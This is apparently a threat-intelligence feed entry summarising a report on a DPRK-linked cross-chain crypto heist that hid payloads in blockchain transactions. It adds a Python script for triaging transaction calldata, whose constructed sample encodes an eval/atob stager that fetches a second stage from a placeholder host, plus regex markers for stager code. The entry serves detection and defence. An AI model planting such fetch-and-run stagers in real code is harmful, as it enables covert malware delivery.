Cross-Chain TxDataHiding Crypto Heist: A Very (Very) Chainful Process (Part 4)
ID: d00885da-b984-54e9-ac5c-16a0123eea90
STIX ID: report--d00885da-b984-54e9-ac5c-16a0123eea90
Feed Name: Ransomware ISAC Blog
Date Published: 2025-12-08
Date Updated: 2026-04-19
Author: [email protected] (Nick Smart and Andrii Sovershennyi)
Executive summary: Ransom-ISAC, working with Crystal Intelligence and other collaborators, investigated a September 2025 cryptocurrency and data-theft campaign that is likely linked to DPRK financial cyber operations. The intrusion was multi-stage: phishing seeded a private, weaponised GitHub repository; cross-chain TxDataHiding delivered obfuscated payloads on public blockchains; and takedown-resistant, blockchain-based C2 and downloaders then deployed OmniStealer and DEV#POPPER.JS RAT variants. The report provides a timeline analysis, IOCs (IPs, wallet addresses, transaction hashes and malware SHA256s), on-chain tracing of the stolen funds across TRON, BSC and other chains, and contextual attribution details, including a Russian IP overlap and the laundering patterns observed.
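The summary names TxDataHiding, a payload carried in the input data of an ordinary on-chain transaction, but the report's details are behind the subscription. The following is an added triage example, written for this page and not code from the Ransom-ISAC report or its authors. It assumes one plausible packing (an ABI-encoded string argument after a 4-byte function selector), uses a hypothetical selector and constructed sample calldata, and follows one layer of `atob("...")` so the inner stage is visible; the campaign's real encoding, selectors and payloads are not known from this page.

```python
import base64
import re
import string

# Added example, not from the report. The encoding assumed here (an ABI-encoded
# string after a 4-byte selector) and every sample below are constructed.

PRINTABLE = set(string.printable.encode())
# Markers typical of a script stager; a hit is a triage signal, not proof.
STAGER_MARKERS = re.compile(
    rb"eval\(|new Function\(|atob\(|fromCharCode|powershell|https?://", re.I)
ATOB_ARG = re.compile(rb"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def abi_encode_string(selector_hex: str, text: str) -> str:
    """Build calldata for f(string); used only to construct the sample input."""
    raw = text.encode()
    pad = (-len(raw)) % 32
    return ("0x" + selector_hex
            + (32).to_bytes(32, "big").hex()          # offset of the string
            + len(raw).to_bytes(32, "big").hex()      # string length
            + (raw + b"\x00" * pad).hex())            # bytes, zero-padded


def abi_decode_string(data: bytes):
    """Decode a single dynamic string argument; None if the layout does not fit."""
    body = data[4:]
    if len(body) < 64:
        return None
    offset = int.from_bytes(body[:32], "big")
    if offset + 32 > len(body):
        return None
    length = int.from_bytes(body[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(body):
        return None
    return body[start:start + length]


def printable_ratio(b: bytes) -> float:
    return sum(c in PRINTABLE for c in b) / len(b) if b else 0.0


def triage_calldata(calldata_hex: str) -> dict:
    """Decide whether transaction input data looks like a hidden text payload."""
    data = bytes.fromhex(calldata_hex.removeprefix("0x"))
    payload = abi_decode_string(data)
    if payload is None:
        payload = data[4:]   # not a string call: inspect the raw bytes after the selector
    ratio = printable_ratio(payload)
    markers = sorted({m.decode().lower() for m in STAGER_MARKERS.findall(payload)})
    inner = None
    m = ATOB_ARG.search(payload)
    if m:
        try:
            inner = base64.b64decode(m.group(1), validate=True)
        except ValueError:
            inner = None
    return {
        "selector": data[:4].hex(),
        "printable_ratio": round(ratio, 2),
        "markers": markers,
        "inner_stage": inner,
        "suspicious": ratio > 0.9 and bool(markers),
    }


# Constructed sample 1: an ERC-20 transfer(address,uint256) call (selector a9059cbb).
BENIGN_TRANSFER = ("0xa9059cbb"
                   + "00" * 12 + "11" * 20                 # recipient, left-padded
                   + (10 ** 18).to_bytes(32, "big").hex())  # amount

# Constructed sample 2: a hypothetical store(string) call (selector "deadbeef")
# whose argument is a one-line JS stager wrapping a base64-encoded fetch.
STAGER_JS = ('eval(atob("'
             + base64.b64encode(b'fetch("https://example.invalid/s2.js")').decode()
             + '"))')
HIDDEN_PAYLOAD = abi_encode_string("deadbeef", STAGER_JS)

if __name__ == "__main__":
    for name, tx in (("transfer", BENIGN_TRANSFER), ("hidden", HIDDEN_PAYLOAD)):
        print(name, triage_calldata(tx))
```

Run against real chain data, the same function would be fed the `input` field of transactions to (or from) the wallets and contracts listed as IOCs; the printable-ratio threshold and marker list are starting points to tune on your own traffic, not values taken from the report.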
